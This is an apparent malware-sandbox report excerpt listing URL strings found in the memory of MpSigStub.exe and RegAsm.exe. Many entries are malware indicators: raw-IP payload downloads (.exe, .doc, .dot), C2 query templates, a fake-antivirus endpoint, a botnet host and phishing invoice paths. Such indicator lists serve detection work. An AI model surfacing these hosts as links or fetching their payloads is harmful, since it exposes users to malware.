Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://47.89.187.54
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://4threquest.me/
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://4udating.net
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://5.1.83.182:8000/cgi-bin/hello.py?
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://5.135.73.116/win/document_0120200.doc
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://5.152.203.117/tues/invoice.doc
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://5.34.180.57/44313
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://5.39.124.175/files/module.exe
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://5.39.217.221/win/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://5.39.219.206/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://50.63.128.
Source: MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp	String found in binary or memory: http://51.254.164.244/
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://51.255.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://51.75.142.21/
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://51.81.114.167:
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	String found in binary or memory: http://513389.cn/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://54.183.79.85/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://54.187.129.3/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://54.191.142.124/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://54.191.185.232/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://54.193.9.202/
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: http://54.214.246.97/log/SilentUpdater7/install
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://54.215.150.138/
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%d
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%dx
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://54.37.16.60/up/
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://54.39.233.130/de3.tmp
Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	String found in binary or memory: http://56489.eu5.org
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.235.3/up/get_exa.php?l=
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.239.124/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.239.82
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://5p0h.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://5p0h.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/K
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/K5
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://61.135.159.183/installer/sobar.exe
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://61.160.222.11:
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://61.19.253.
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://62.109.31.216/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://62.210.214.
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.176.248/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/CFL/
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/EX/
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/EX/x
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/K/F
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/NL2/?w=
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://63.251.20.97/links/return-west.php
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://64.156.31.
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://64.27.0.205
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://64.27.0.205/up/calc2.bin
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://64.28.184.4/js.php?id=2011
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://65.181.112.251/coke/w8.txt
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.58/trafc-2/rfe.php
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.58/trafc-2/rfe.phpg
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.80/80
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://66.117.6.174/ups.rar
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://66.148.74.7/zu2/zc.php
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://66.40.9.246/binaries
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://66.98.138.92/PH/
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://67.15.
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://67.18.111.82:8088
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://67.210.122.222/~turks/lego/
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://68.178.225.162
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	String found in binary or memory: http://69.31.80.
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://69.31.84.223/
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: http://69.50.164.11/v1/mh.php?pid=%s&cid=%s&p=%s&t=%s&vh=%i&vt=%i
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://69.64.36.110/msn.php?email=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://6flp.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://6tof.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6267730911.0000028BD756A000.00000004.00000001.sdmp	String found in binary or memory: http://7-.j-z-0-3-0-u-u-x-f-1l-3-l-h-w-b-q-z-u-5-n-l-l-m-s-5-v-s-z-g.info
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://70.38.40.185
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://72.29.80.113/~nossacai/
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://75.127.1.211/hkcmd/document.doc
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://76h1.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	String found in binary or memory: http://77.81.225.138/carnaval2017.zip
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://78.128.92.108/document/word.doc
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://78.128.92.26/
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	String found in binary or memory: http://78.157.143.251
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://78.24.220.183/
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://78.46.16.53/~quickend/lll.php
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://78.soupay.com/plugin/g.asp?id=
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/fide/f.wbk
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/naki/n.wbk
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://79.125.7.221/
Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp	String found in binary or memory: http://8.8.8.8/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://81.16.141.208/q37kkp
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://81.176.237.140/serv/
Source: MpSigStub.exe, 00000023.00000003.6435679539.0000028BD7C4B000.00000004.00000001.sdmp	String found in binary or memory: http://81.177.26.20/ayayay
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://81.29.241.70/new/counter.phpframeborder=
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://82.118.23.186/
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.119.68/wp-admin/app/alim.doc
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.119.68/wp-admin/app/updates.doc
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.235.
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.235.63/cgi-bin/check/autoaff3
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://83.136.232.110/44285
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://83.149.75.54/cgi-bin
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.242.164/desktop-st7lsde/
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.242.164/desktop-st7lsde/bid/relay.dot
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://85.17.138.60
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://85.17.3.151/cgi-bin
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://85.17.93.189/iddq/m
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://85.234.191.170/inst.php?id=
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://85.234.191.a7
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://85.255.11
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://85.255.119
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://85.255.11http://ad.eltext.comhttp://ad.tuzikmedia.biz.rsrc
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://88.208.17.127/
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://888888.2288.org/Monitor_INI
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://88888888.7766.org/ExeIni
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: http://89.188.16.
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://89.188.16.18/
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://89.248.161.2/yourdoc.doc
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://89.45.14.196/p1/server
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://8nasrcity.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://9.bohmamei.com/links/return-west.php
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://91.108.68.202/up.php
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://91.142.64.91/quantserve/quant.js
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://91.188.117.157/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://91.188.124.171/
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://91.196.216.64/s.php?ref=
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://91.238.134.77/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://91.239.15.61/google.js
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://92.222.7.
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: http://92.38.135.46/43cfqysryip51zzq.php
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.106/c.exe
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.153/blowjob.exe
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.153/good.exe
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.48/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.48/g
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.48/m/tm.exe%temp%
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.60/c.exe
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://93.189.43.3/kinsingchmod
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://94.102.14.
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: http://94.103.85.236/ds/11.gif
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://94.156.174.7/up/a1a.htmyx_h=
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://94.23.210.144/promo/promo.php
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://94.23.39.156/fakeav/files.php?jsoncallback=?
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://94.75.
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://95.173.183.
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://95.46.99.199/template.doc
Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp	String found in binary or memory: http://95.64.47.164/
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://980.jlbtcg.cn
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://9ifz.org/2345
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://9o0gle.com/
Source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp	String found in binary or memory: http://Andrei512.narod.ru
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://Botnet.8800.org
Source: RegAsm.exe, 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://Motobit.cz
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://Viewpics.DYNU.com/views.php?dir=pics&section=hot&clip=14
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://YOURSITE.com/bot.exea
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/interFace/ActiveSeed.aspx
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/interface/SeedInstall.aspx
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/wevoo/data.dat
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/wevoo/data/data
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://Yyl.mofish.cn/wevoo/lists/200
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://a-search.biz/&
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomf.cat/
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomf.cat/zjiqnx.html
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://a.pomfe.co/hnwila.xml
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://a.up-00.com/
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://a0571310.xsph.ru/djfklvk/revert.php
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://a1us6j2z.recordgate.co
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	String found in binary or memory: http://aaacollectionsjewelry.com/x9djsa
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://aancyber77.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://aapache.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://aartemis.com/?type=sc&ts=
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://abeidaman.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://abidjanlit.com/loyiruef/invoice/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://abitando.net/outstanding-invoices/
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://abluefantasies.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://about:blankhao.360.cn
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://abraandthong.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://acacia19.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://academiamylife.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://acayipbiri.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://acceso.masminutos.com
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: http://acetica.online/presently/refuge/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://acipatobo01.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://actionforfiletransferthroughcloudbusinessinternationalglobalsys.ydns.eu/business/business.doc
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://activecodec.0fees.net/codec/mp3/codec_download.htm
Source: MpSigStub.exe, 00000023.00000003.6320105225.0000028BD6890000.00000004.00000001.sdmp	String found in binary or memory: http://activedating.net
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://actresswallpaperbollywood.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://acutelogisticsltd.com/wp-content/themes/acutelogisticsltd/js/ie-emulation-modes-warning.js
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://ad.171817.com/css/1.js
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://ad.eltext.com
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	String found in binary or memory: http://ad.tuzikmedia.biz
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://adaptservices.net/qwao8cj4gkogu
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://addictedtobash.blogspot.com/
